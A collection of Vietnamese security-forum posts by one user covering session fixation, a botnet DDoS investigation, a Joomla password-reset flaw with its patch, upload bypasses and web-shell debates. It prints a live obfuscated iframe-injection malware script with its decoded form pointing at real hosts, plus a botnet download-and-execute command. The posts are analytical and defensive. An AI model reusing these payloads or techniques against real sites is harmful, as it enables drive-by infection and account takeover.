Messages posted by: hackerbinhphuoc

@flier_vn: cái mình nói là về "session fixation" bồ ạ, mình hiểu sao nói vậy thôi, còn bạn ko hiểu hay mình nói sai thì mong bạn nói rõ nhé, cám ơn.
còn cái trên chỉ là ví dụ, còn việc thành công 100% thì chẳng dám chắc vì mình chưa biết site bạn thế nào, bạn là admin sao bạn ko thử nhỉ ?

Sao em thấy nó không hề thực tế tí nào. Vì thường em thấy chỉ lúc chứng thực thành công mới tạo session mà thôi. Còn đằng này lại ấn định trước thì chưa hề thấy bào giờ. Vậy thực tế có trường hợp nào như trường hợp này không vậy, hay chỉ là trên lý thuyết mà thôi.
===> phần này mình xin nói là hoàn toàn khả thi và đã thử thành công, đây là một lỗi phổ biến.
Mình nói về php, trong php.ini có 1 biến session.use_only_cookies =, theo mặt định là 0, có nghĩa là php sẽ cho phép lấy session theo 2 cách là cookies và url, lợi dụng điểm này, hacker sẽ login vào để có 1 session cho mình, sau đó dựa vào bug xss hoặc gửi trực tiếp cho victim url login chứa session đã định sẵn của hacker:
http://www.site.com/login.php?sessionid=1234
khi victim click chuột vào url này thì đồng nghĩa khai báo với webserver là vitcim có sessionid là 1234, trùng với hacker, nếu victim login bằng sessionid đó thì hacker chỉ viêc refesh lại trình duyệt là đã có phiên làm việc của victim. cách fix cho trường hợp này là set session.use_only_cookies =1 ( không cho set session bằng url). Vài lời theo hiểu biết của em, hy vọng giúp được anh.

gặp trường hợp này thì chỉ có 2 trường hợp:
1. Website bạn có bug, bạn cam đoan là ko bị SQL ịnection ( mình ko rõ) vậy thì thử kiểm tra xem các pasword của bạn thế nào? các form upload, phần admin ( nên đổi folder này thành 1 cái tên lạ 1 tý). . . .
2. Host của bạn bị local, cái này thì bạn ko thể tự chống được mà phải nhờ vào sự bảo mật của sever bạn đang host! Set Permission mà ko được thì website của bạn chẳng còn tý bảo vệ nữa, ai cũng có quyền edit cả!
Bạn bảo bạn ko có tiền đổi host thì thật sự mình chẳng biết khuyên gì nữa!

hehe vậy thì phải cầu cho các hack cơ tập trung vào BKIS nhiều vào để anh Quảng bắt hết, đỡ khổ cho các website khác, bkis trở thành "trung tâm xử lý các sự cố"

trên đó hoàn toàn là suy luận của cá nhân không liên quan gì đến thông tin BKIS bắt kẻ tấn công DDOS cả!

em có viết một bài tìm hiểu về vụ việc này:
Kẻ tấn công vừa bị bắt theo thông tin trên báo là một học sinh trung học ở Quảng Nam. Vậy làm sao một học sinh trung học có thể huy động nhiều máy tính để tấn công được BKAV.com.vn, chúng ta sẽ cùng nhau phân tích:

Nhận thông tin:

Vào ngày chủ nhật 5/10/2008 khi đang ở nhà, tôi truy cập vào trang bkav.com.vn để down phần mềm diệt virus về diệt virus cho máy laptop người thân, tuy nhiên tôi không thể nào truy cập vào trang bkav.com.vn. Một lát sau tôi liên tục nhận được thông tin website http://www.bkav.com.vn bị tấn công botnet, đến chiều hôm đó tôi đăng tin lên trang http://vietnamsecurity.googlepages.com, ngày hôm sau các báo bắt đầu đăng tin và phỏng vấn BKIS về vụ việc tuy nhiên bkis đã phủ nhận tất cả thông tin và đính chính là vụ việc trên chỉ là hoạt động nâng cấp thường nhật của BKAV.

Sau đây là những hình ảnh chụp được ngày 5/10:

http://img360.imageshack.us/img360/3162/bkavek1.jpg

Tuy nhiên, tôi vẫn tiếp tục nhận được thông tin bkav bị ddos, website bkav.com.vn tiếp tục hoạt động chập chờn và thậm chí có lúc không truy cập vào được trong thời gian dài! đến lúc này thì thông báo việc nâng cấp của bkav không còn hợp lý nữa, nó củng cố thêm thông tin cho là bkav.com.vn bị tấn công botnet. Sau đây là những hình ảnh cập nhật sau đó:

http://vietnamsecurity.googlepages.com/bkav5.JPG

http://vietnamsecurity.googlepages.com/bkav6.JPG

http://vietnamsecurity.googlepages.com/bkav7.JPG

Đồng thời vào 17h ngày 7/10 tôi lại nhận được những hình ảnh chụp màn hình được cho là hình ảnh tấn công trang bkav.com.vn và một file có tên là BKAV.exe ( được cho là file tấn công bkav.exe)

http://vietnamsecurity.googlepages.com/bkis1.JPG

http://vietnamsecurity.googlepages.com/bkis2.JPG

http://vietnamsecurity.googlepages.com/bkis3.jpg

Đồng thời trên mạng cũng xuất hiện các thông tin cho rằng có một người đã dùng các chèn mã độc vào các bản crack BKAV pro, các bản auto game và chèn iframe vào các website lớn để từ đó xây dựng mạng botnet để tấn công http://www.bkav.com.vn

Tìm thông tin

Sau khi nhận thông tin và phản hồi từ các báo chí và bạn bè, tôi tiến hành điều tra sự việc!

Tôi tìm bắt tìm thông tin về các hacker hay sử dụng botnet, các loại botnet phổ biến ở Việt Nam, tìm các các diễn đàn lớn đã bị tấn công trong thời gian qua để tìm manh mối! đồng thời nhờ người có kinh nghiệm tiến hành thử nghiệm và phân tích cơ chế hoạt động của của file BKAV.exe.

Kết quả là tôi cũng tìm được một số manh mối:

Sau khi phân tích file BKAV.exe cho thấy đây là một loại virus nội, đã được đưa vào danh sách virus của BKAV, thông tin thêm:

http://bkav.com.vn/thong_tin_virus/13/08/2008/3/1755/

đồng thời tìm kiếm trên các forum lớn, tôi tìm được các thông tin sau:

http://vietnamsecurity.googlepages.com/trojan.jpg

đây là đoạn mã chèn file vào website, cụ thể ở đây là 4gamevn.com, cơ chế của nó là tự download file trojan.exe về máy người dùng và thực thi. Thông tin này càng lý giải cho việc làm sao một học sinh trung học có thể xây dựng một mạng lưới bot net với tầm hơn 100 ngàn victim!

Sau khi download file trojan.exe về, tôi tíên hành dịch ngược và may mắn có được email của người viết con trojan này! Tuy nhiên vẫn chưa có được chứng cứ cụ thể về vụ việc tấn công BKAV. Từ địa chỉ email đó tôi bắt đầu tìm được những thông tin cá nhân của kẻ tấn công, hình ảnh, các forum người này tham gia! nó có email là: Linh_XXX@yahoo.com , từ đó tôi vào blog, đồng thời cũng biết được níck trên mạng của kẻ đó là LLY. . ., một tay chơi botnet còn khá nhỏ tuổi ở Việt Nam, tôi bắt đầu tìm hiểu cách xây dựng mạng Botnet của Lly. . .

Câu chuyện hé mở:

Qua tìm hiểu cho thấy kẻ tấn công còn trẻ tuy nhiên có sự nghiên cứu về botnet, cc chùa, và biết lập trình!

Lly… đã viết cho mình một chương trình botnet mới dựa trên nền tảng mIRC để điều khiển các victim. Sau đó lly… đã cài con virus này vào các chương trình chơi auto game, chương trình crack Bkpro (chưa tìm ra phiên bản để kiểm chứng), đồng thời dựa vào các mối quan hệ với các tay chơi botnet khác kiếm shell trên các diễn đàn lớn, đông lựơt truy cập để cài iframe vào các diễn đàn đó, thậm chí có thể lly đã cài vào chính diễn đàn về âm nhạc và giải trí mà lly đang quản lý!

Sau khi victim bị nhiễm vào máy sẽ thự động nhận lệnh từ một file có trên website của kẻ tấn công: http://www.xxx.net/server/php nội dung của file này có dạng như sau:

http://vietnamsecurity.googlepages.com/server.JPG

[Server] server=irc. port=6667 chan=#zz ver=3 IP=58.xxx.xxx.xxx

với các thông số:

Server: đây là server irc để victim connect vào! vậy tại sao ở đây chỉ là irc? Đó chính là vì kẻ tấn công muốn bình thường victim không thể connect tới server được, khi nào kẻ tấn công chỉnh lại file server.php thì victim mới connect vào!

Port:6667 là port mặt định của IRC

Chan: đây là room mà kẻ tấn công sẽ tạo ra để điều khiển các victim

Ver=3: là version của virus botnet này, có nó chức năng tự động cập nhật khi phiên bản trong máy victim cũ!

IP=58.xxx.xxx.xxx: đây là ip của kẻ tấn công

Sau khi nhận lệnh từ file server.php, máy của vitim sẽ tự động connect tới server IRC.nhac…..vn và join vào room ZZ

Kẻ tấn công đã khéo léo viết chương trình botnet nhận lệnh từ mIRC

Cấu trúc câu lệnh như sau:

!lly… download http://www.xxx.vn/bkav.exe c:\a.exe 1

Ý nghĩa của nó là sẽ tự động download file bkav.exe từ server về máy victim và tự động thực thi! File bkav.exe có nhiệm vụ là ghi vào regstry những biến để liên tục ping đến server bkav.exe gây ra cuộc tấn công từ chối dịch vụ!

vậy khi cần thực hiện cuộc tấn công, lly.. chỉ cần connect vào mạng mIRC và gõ vài câu lệnh!

Note: Bạn hackerbinhphuoc, websever mà bạn hosting website http://vietnamsecurity.googlepages.com và các file image của bạn hạn chế băng thông sử dụng một cách khăt khe. Vì vây rất nhiều lúc các hình ảnh minh họa bài viết của bạn không hiên lên HVA forum được, hay hiện rất chậm. Ngoài ra khuôn khổ các image quá lớn nên khi load lên khung hình (table) HVA forum bị broken nghiêm trọng, làm khó đọc bài viết. Tôi đã save chúng, sửa lại và hosting chúng trên webserver của tôi. Khi nào có nơi hosting tốt, bạn có thể thay đổi lại..PXMMRF

@gamma95: anh trình thấp,còn em trình còi, chưa học qua môn java nên em vào tool > Options> Content > tiện tay bỏ check cái Enable Java script (trên FF) luôn!
rồi sau đó upload lên tự dưng nó báo "File was successfully uploaded."

Mấu chốt giải quyết vấn để làm thế nào an toàn trong file upload đó là lưu giữ file upload lên một nơi mà không thể truy cập bởi user thông qua URL

em nghĩ là đó chỉ là giải pháp cho các website lớn, quản trị cả sever, còn đối với phần lớn các website vừa và nhỏ dùng host share thì giải pháp tốt nhất là cấm chạy script trong folder uploads ( tuy nhiên không tránh được trường hợp upload sang folder khác hoặc include files)

tắt chức năng sử dụng javascript đi hoặc là lưu file đó lại, đổi chữ "gif" bằng "php" được không nhỉ ?

hehe em nói ở ví dụ 1 mà anh, rõ ràng nó check ở client mà!, còn các ví dụ khác thi buộc phải chỉnh gói tin gửi đi rồi! nhiều site như vậy lém, check ở client!

cho em hỏi là tại sao mình không chỉnh lại đoạn javascript rồi upload lên hoạt là tắt chức năng sử dụng javascript đi vì cách này em hay dùng thay vì phải dùng tool chỉnh gói tin gửi đi! tuy nhiên cám ơn anh nhiều vì cho em cái tool khá hay hehe!

Em để ý trên HVA một số mục "Bài gởi sau cùng" bị sai!
ví dụ như trong bài Mục này, bài đầu tiên là " Không thể đăng nhập từ form nhập liệu ở trang diễn đàn chính" để " Bài gởi sau cùng" là "thangdiablo" nhưng vào xem bài viết thì anh Conmale lại là người trả lời . . .
và còn sai rất nhiều ở các mục khác như tán gẫu . . .
mong BQT xem lại!

hôm nay có anh bạn gửi tới một link có chứa virus, ảnh bảo rằng mặt dù đã vào host xoá đi rất nhiều lần nhưng được một thời gian thì vẫn bị!
link có dạng là:
http://www.hkp.com/index.php
và đoạn mã chèn vào file index.php có dạng là:
Code:

<script>
<!--
var d=document,kol=561;
function O10H48B5552374583(H48B555237497D){ function H48B5552374D79() {return 16;} return( parseInt(H48B555237497D,H48B5552374D79()));}function H48B555237557D(H48B555237596E){ var H48B5552376563 = 2; var H48B5552375D6A='';for(H48B5552376166=0; H48B5552376166<H48B555237596E.length; H48B5552376166+=H48B5552376563){ H48B5552375D6A += ( String.fromCharCode (O10H48B5552374583(H48B555237596E.substr(H48B5552376166, H48B5552376563))));}return H48B5552375D6A;} document.write(H48B555237557D('3C7363726970743E696628216D796961297B642E777269746528273C494652414D45206E616D653D4F31207372633D5C27687474703A2F2F37372E3232312E3133332E3137312F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A313537383130292B2730343564646434666262325C272077696474683D373334206865696768743D323135207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F494652414D45203E27293B7D766172206D7969613D747275653B3C2F7363726970743E'));
//-->
</script>

giải mã ra được:
Code:

<IFRAME name=O1 src=\'http://77.221.133.171/.if/go.html?'+Math.round(Math.random()*15375)+'28539d6\' width=75 height=205 style=\'display: none\'></IFRAME >');}var myia=true;</script>

hoặc là đoạn code này:
Code:

<script>eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%62%61%64%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%6b%61%72%61%62%6f%6b%2e%62%69%7a%2f%73%70%2f%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%34%34%33%35%31%34%29%2b%27%65%37%64%63%30%66%66%35%65%32%39%34%5c%27%20%77%69%64%74%68%3d%37%36%36%20%68%65%69%67%68%74%3d%35%37%39%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29")); </script>

xem xét lại thì đây là con virus nhiễm vào server và tự động chèn mã độc vào những file index.x ( hoặc default.x) với x có thể là html,php,asp,aspx. . .
tìm thêm thông tin thì nó là con này: trojan clicker html iframe ru
vậy làm sao chống lại khi mà mình không phải là quản trị của server này đây ?
sau một hồi tìm hiểu mình nhận ra là nó chỉ chèn iframe vào các file index thôi, vậy thì mình đổi file mặc định thử xem!
đầu tiên: mình vào web settings chỉnh lại default docs, thay vì là index.html mình chỉnh thành trangchu.html, index.php thành trangchu.php!
sau đó: vào host rename nhưng file dạng index.x hay default.x thành trangchu.x thôi ( nếu liên quan tới code thì vào code chỉnh lại)
vậy là mình có thể tạm thời tránh việc bị chèn iframe trong lúc chờ admin server diệt virus rồi!
đây là một cách nhỏ của em tránh việc chèn iframe đối với các virus chỉ chèn vào file index! anh nào có cách hay hơn xin chia sẻ với em!

ở tp Hồ Chí Minh bạn có thể học chứng chỉ CEH ở Trung tâm Athena http://www.athena.com.vn

hehe nhờ anh gamma95 giải thích em mới hiểu! lúc đầu khi chưa biết về cái token thì em là SQL Injection nhưng sau xem lại thì đúng là ko phải thật!

Bản chất của lỗi này thật ra cũng là SQL Ịnection!
http://hkp.com.vn/index.php?option=com_user&view=reset&layout=confirm
dòng này được tạo ra khi điền email để forgot pasword và 1 Token đã gửi về mail, form này dùng để điền Token đó!
Tuy nhiên lại phát sinh lỗi ở dòng:
Code:

$db->setQuery('SELECT id FROM #__users WHERE block = 0 AND activation = '.$db->Quote($token)); <

nhiệm vụ của nó là liệt kê ra user có activation = cái token vừa nhập vào và cho phép đổi password mới. Vì vậy khi ta chèn kí tự ' vào thì lệnh nó sẽ trở thành:
Code:

SELECT id FROM jos_users WHERE block = 0 AND activation = ''

nó lại đi liệt kê ra các user có activation là rỗng thay vì là user có activation phù hợp và theo nguyên tắc chỉ lấy 1 kết quả, nó sẽ lấy user có id nhỏ nhất và thường thì đó là tài khoản của admin! vì vậy dẫn tới việc password của admin bị reset!
Cách khắc phục:
- Nâng cấp phiên bản Joomla! mới nhất (1.5.6 hoặc mới hơn), hoặc sửa lỗi trong file /components/com_user/models/reset.php với đoạn mã sau:

Sau global $mainframe; trên dòng 113 của file reset.php, thêm:
Code:

if(strlen($token) != 32) {
{
$this->setError(JText::_('INVALID_TOKEN'));
return false;
}

sao có nhiều topic hỏi vấn đề này thế nhỉ?
theo mình thì việc tìm admin có thể rất dễ mà cũng rất khó
thường thì coder hay đặt link login admin dạng: admin.php,admin.asp, dangnhap.asp. . ., còn folder thì là /admin, /administrator, /webeditor, /webadmin /admincp, /quantri, còn vài cách đặt nữa thì quả thật pó tay, cần dựa vào kinh nghiệm của bạn thôi!
còn việc mò hay dùng tool như nhau thôi!, theo bạn các tool dùng như thế nào?, nó cũng dùng các link trong mã html trả về và đoán folder giống mình thôi!, nó chỉ giúp mình đỡ mất thời gian thôi, nhưng đôi khi lại ko đem lại kết quả mong muốn hơn việc mò bằng tay, đôi khi folder admin lại được tìm bằng google hoặc là lỗi lộ đường dẫn
tóm lại chẳng có 1 cách chung cho việc tìm folder của admin!

chính vì tác giả biết vấn đề này là rất nhiều sever gặp phải nên mới công bố rộng rãi để các admin biết mà fix!
bản thân em cũng đã thông báo cho nhiều sever bị lỗi này, tuy nhiên em không có điều kiện tìm hiểu rõ ràng các sever nên chỉ dừng lại ở mức thông báo mà thôi!

em cũng nghỉ như anh conmale vậy! tuy nhiên ở đây em chỉ muốn làm rõ việc kshell và c99 là 2 chuyện hoàn toàn khác nhau, còn anh azteam có thể tham khảo các bài viết trên hoặc liên hệ kikicoco nhé, em chẳng biết gì nên không đóng góp ý kiến được!

Hôm nay, tôi lại nhận được một link trên một server có lỗi Full Trust Asp.Net Security Vulnerabilties số lượng site trên server này khá lớn và có nhiều site khá tiếng tăm happy . Số các server Windows ở Việt Nam bị lỗi này không phải là nhỏ. Có một vài lần các anh em ở VHS đã test và thông báo vài server cho chủ server. Đối với server dùng Helm Controller nếu cài thông thường thì chắc chắn là dính lỗi này.

Tôi mô tả lỗi này như sau :
toàn bộ các site trên cùng server chạy chung application pool và chung account chạy ASP.NET. Đối với HELM thì chỉ có account chạy riêng cho asp, php cho mỗi site, còn account chạy ASP.NET đều chạy chung account ASP.NET. Nên nếu không cấu hình tốt cho account này thì web chạy bằng account này có thể truy cập toàn bộ các thư mục trên máy chủ mà acc này có quyền (tất cả các website + các thư mục có quyền cho everyone). Tóm lại là khi bị lỗi này thì chỉ cần vào được 1 site thì attacker có thể vào toàn bộ các site khác trên toàn máy chủ. (windows local hack)
Các server riêng Wiondows nếu cài thông thường chỉ dừng ở mức chạy được thì chắc chắn cũng dính lỗi.

Cách khắc phục :
- Tốt nhất là chạy thành nhiều application pool, mỗi 1 site chạy bằng 1 acc asp.net riêng
- Cấu hình tốt cho WMI, WSH, regedit,... (đọc tài liệu để tìm hiểu)

Công cụ test lỗi này: K-Shell 1.0 by kikicoco
http://duchaikhtn.googlepages.com
http://duchaikhtn.googlepages.com/kshell_1.0.zip

Tham khảo thêm : Công cụ kiểm tra lỗi bảo mật cho .NET windows

Hy vọng với bài viết này tình hình các server Windows sẽ cải thiện được tình hình và sớm fix lỗi.
(blog kikicoco)

"Tác giả" có quyền gì và dùng lý do nào để tự cho phép mình upload "shell" lên host của người khác vậy? ==> xin thưa rằng tác giả không upshell lên host người khác!, chỉ có những người down về làm công cụ hack cho mình mới up lên, và em nghĩ người đó cũng thiếu kiến thức mới vừa up r57 vừa up kshell!
con shell này đã được tác giả up lên mạng, việc sử dụng thế nào tùy mỗi người!
nếu như anh comale chưa biết rõ việc gì thì cũng đừng nên kết luận vội vàng!
nếu trên host có tên của tác giả thì người hack là tác giả à ?, vậy nhóm viết ra c99 hay r57 là người hack những trang có con đó à ?
tiếc là em không phải là tác giả !

và con kshell mục đích đâu phải là dùng để hack mà là check sever cơ mà!, trong code tác giả đã nói rõ rồi!

Hèm... lại r57, lại cái trò lấy đồ của người khác rồi dán lên "by.. me". ==> cái này anh comale không đúng rồi, không phải là con r57, đoạn vừa rồi là trên con kshell, được phát triển lên từ con webadmin 1.0 (có thêm một số tính năng khác), có ghi bản quyền rõ ràng chứ không "by . . .me"!
có thể sever của bạn có người up con này lên, nhưng thấy vừa up r57 vừa up kshell thì người này hơi vui tính một chút!, bạn nói rõ site của bạn được không ?